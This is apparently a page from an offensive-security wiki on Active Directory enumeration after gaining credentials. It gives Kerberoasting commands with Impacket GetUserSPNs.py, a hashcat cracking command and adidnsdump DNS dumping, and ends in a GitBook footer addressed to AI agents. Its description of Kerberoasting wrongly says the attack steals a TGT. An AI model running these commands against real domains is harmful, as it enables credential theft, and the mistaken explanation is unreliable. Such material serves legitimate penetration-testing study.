> For the complete documentation index, see [llms.txt](https://book.dragonsploit.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://book.dragonsploit.com/windows/active-directory/auth-enumeration.md).

# auth-enumeration

Much of the same enumeration is done after you get authentication, so go back and redo your enumeration just use the creds you now have. Once you completed that you can come back here and see what else you can do.

## Kerberosatble Users

Kerberoasting is an attack technique that involves stealing the Kerberos Ticket-Granting Ticket (TGT) of a user and using it to request service tickets for other systems on the network. Impacket is a collection of Python scripts that can be used to perform Kerberoasting attack. Here's a general process for performing Kerberoasting using Impacket:

1. Install Impacket: You will need to have Impacket installed on your system in order to use the Kerberoast script. You can install Impacket by running the following command:

Copy code

```shell
pip install impacket
```

2. Get a list of user accounts: To perform Kerberoasting, you will need a list of user accounts in the target AD domain. You can use the Impacket GetUserSPNs.py script to enumerate the user accounts in the domain.

Copy code

```shell
GetUserSPNs.py -dc-ip <DC_IP> <domain>/<user>
```

3. Request TGT for the user: Once you have a list of user accounts, you can use the Impacket GetUserSPNs.py script to request TGT for the user

Copy code

```shell
GetUserSPNs.py -request -dc-ip <DC_IP> <domain>/<user>
```

4. Crack the hashes with hashcat

Copy code

```shell
hashcat -m 13100 -a 0 <path to hashes> <path to wordlist>
```

## DNS Enumeration

```
adidnsdump -u '<FQDN>\<username>' -p '<password>' <NS server>
```

It might be useful to see tombstoned (deleted) records.

```
adidnsdump --include-tombstoned -u '<FQDN>\<username>' -p '<password>' <NS server>
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://book.dragonsploit.com/windows/active-directory/auth-enumeration.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
